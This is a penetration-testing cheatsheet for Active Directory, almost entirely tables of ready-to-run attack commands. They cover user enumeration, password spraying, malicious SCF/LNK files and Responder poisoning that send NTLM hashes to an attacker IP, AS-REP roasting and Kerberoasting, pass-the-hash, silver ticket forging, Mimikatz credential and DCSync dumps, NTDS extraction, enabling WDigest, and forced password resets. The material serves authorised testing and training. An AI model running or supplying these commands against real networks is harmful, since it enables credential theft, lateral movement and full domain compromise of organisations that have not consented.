Active Directory Cheatsheet
Penetration testing and network exploitation involve a wide array of tools and techniques designed to assess and improve the security of computer systems. These tools help identify vulnerabilities, validate user credentials, and simulate attacks to test defenses. From enumerating network shares and users to exploiting weaknesses in authentication protocols like Kerberos, each tool serves a specific purpose in the broader strategy of ethical hacking. This collection of commands and tools provides a comprehensive overview of the methods used to enumerate systems, manage credentials, gain remote access, and escalate privileges, ultimately aiding in the detection and mitigation of security threats. Below are organized tables detailing these tools and their applications.
The process should go as follows:
1- get users (userenum, kerbrute)
2- get passwords/hashes (ASRep, Password Spraying, NTLM Stealing, Cracking or relaying) to connect or pass the hash or overpass the hash (if no NTLM auth and GUI) or perform DCSync
3- get service account password/hashes/ticket (kerberoasting(TGSRep), silver ticket) to pass the hash or pass the ticket
4- get DA password/hashes (mimikatz, golden ticket) to connect or have full persistence with golden ticket or shadow copies
more commands on: WADComs
| Tool/Command |
Description |
enum4linux $IP |
Enumerate SMB shares and users on the target IP. |
crackmapexec smb --pass-pol $IP |
Check password policy on the target SMB server. |
crackmapexec smb $IP --shares |
List available SMB shares on the target IP. |
crackmapexec smb $IP -M spider_plus |
Run Spider Plus module on the target SMB server. |
smbmap -u invalid -H $IP |
Attempt to connect to SMB shares with an invalid user. |
ldapsearch -H ldap://$IP -x -b "dc=domain,dc=local" |
Perform LDAP enumeration on the target domain. |
Username Validation and Password Spraying
| Tool/Command |
Description |
kerbrute_linux_amd64 userenum -d domain.local --dc $IP users.txt |
Enumerate valid usernames in the domain. |
kerbrute_linux_amd64 passwordspray -d domain.local --dc $IP users.txt 'S3cret' |
Spray a common password across the enumerated usernames. |
kerbrute_linux_amd64 bruteforce -d domain.local --dc $IP creds.txt |
Perform brute-force attacks using a list of credentials. |
crackmapexec smb $IP -u users.txt -p 'S3cret' |
Attempt to login to SMB with a list of users and a single password. |
crackmapexec smb $IP -u users.txt -p passwords.txt |
Attempt to login to SMB with a list of users and multiple passwords. |
| Tool/Command |
Description |
crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=filename SERVER=IP_RESPONDER |
Create a malicious SCF file to capture NTLM hashes via SMB. |
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=filename SERVER=IP_RESPONDER |
Create a malicious LNK file to capture NTLM hashes via SMB. |
responder -I tun0 -wv |
Run Responder to capture NTLM hashes by poisoning LLMNR and NTB-NS requests. |
\\\test |
Trigger authentication by accessing a UNC path, relaying the NTLM hash to a target machine. |
| Tool/Command |
Description |
crackmapexec ldap $IP -u user -p P4ssword --password-not-required --admin-count --users --groups |
Enumerate LDAP with credentials, focusing on admin users and groups. |
enum4linux -u user -p P4ssword -a $IP |
Perform detailed SMB enumeration with credentials. |
crackmapexec smb $IP -u user -p P4ssword |
Connect to SMB server with credentials. |
crackmapexec smb $IP -u user -p P4ssword --shares |
List SMB shares accessible with credentials. |
crackmapexec smb $IP -u user -p P4ssword -M spider_plus |
Run Spider Plus module with credentials. |
Kerberos and Ticket Management
| Tool/Command |
Description |
impacket-getTGT domain.local/user:P4ssword |
Obtain a Kerberos ticket for the user. |
export KRB5CCNAME=ksimpson.ccache |
Set environment variable for the Kerberos ticket cache. |
klist |
List cached Kerberos tickets. |
impacket-GetNPUsers -dc-ip $IP -no-pass -usersfile users.txt domain.local/ |
Perform AS-REP Roasting attack. |
impacket-GetUserSPNs -request -dc-ip $IP domain.local/user |
Perform Kerberoasting attack. |
Remote Access and Execution
| Tool/Command |
Description |
impacket-psexec domain.local/user:P4ssword@$IP |
Execute commands remotely via SMB. |
crackmapexec winrm $IP -u user -p P4ssword |
Connect to WinRM with credentials. |
evil-winrm -i $IP -u user -p P4ssword |
Connect to WinRM with credentials using Evil-WinRM. |
crackmapexec rdp $IP -u user -p P4ssword |
Connect to RDP with credentials. |
rdesktop -u user -p P4ssword -d domain.local $IP -r disk:tools=/home/kali/tools -r clipboard:PRIMARYCLIPBOARD |
Connect to RDP with credentials and mount tools. |
Password Dumping and Hash Management
| Tool/Command |
Description |
impacket-secretsdump -just-dc domain.local/user:P4ssword@$IP |
Dump NTDS hashes from the domain controller. |
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL |
Dump local SAM, SYSTEM, and SECURITY files. |
crackmapexec smb $IP -u user -p P4ssword --ntds |
Dump NTDS hashes via SMB. |
Bloodhound and Network Visualization
| Tool/Command |
Description |
bloodhound-python -d domain.local -u user -p P4ssword -ns $IP -c all |
Collect data for Bloodhound network visualization. |
Pass-the-Hash Attacks
| Tool/Command |
Description |
crackmapexec smb $IP -u administrator -H 'LMHASH:NTHASH' --local-auth |
Perform SMB login using pass-the-hash. |
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@$IP |
Execute commands via SMB using pass-the-hash. |
crackmapexec winrm $IP -u administrator -H 'LMHASH:NTHASH' --local-auth |
Connect to WinRM using pass-the-hash. |
evil-winrm -i $IP -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 |
Connect to WinRM using pass-the-hash with Evil-WinRM. |
Silver Ticket and Other Advanced Attacks
| Tool/Command |
Description |
impacket-getPac -targetUser administrator domain.local/user:P4ssword |
Obtain a PAC for creating a Silver Ticket. |
impacket-ticketer -spn MSSQLSvc/dc1.domain.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain domain.local |
Create a Silver Ticket for a service. |
impacket-mssqlclient -k dc1.domain.local |
Connect to MSSQL using a Silver Ticket. |
Local Privilege Escalation and Shell Management
| Tool/Command |
Description |
.\mimikatz.exe "privilege::debug" "token::elevate" "log hashes.txt" "sekurlsa::tickets" "sekurlsa::logonpasswords" "lsadump::sam" "exit" |
Elevate privileges, log tickets, and dump SAM hashes using Mimikatz. |
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit" |
Perform DCSync attack to dump domain hashes. |
.\mimikatz.exe "kerberos::list /export" "exit" |
List and export Kerberos tickets. |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 |
Enable WDigest for password capture. |
Kerberos Ticket Management
| Tool/Command |
Description |
.\mimikatz.exe "privilege::debug" "kerberos::ptt 0-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi" "exit" |
Pass-the-ticket using a .kirbi file. |
Bloodhound and Network Visualization
| Tool/Command |
Description |
.\SharpHound.exe -c all |
Collect data for Bloodhound network visualization. |
| Tool/Command |
Description |
net rpc password target_user -U pwned_user -S $IP |
Change a user’s password using RPC. |
sudo ntpdate $IP |
Synchronize time with the target server. |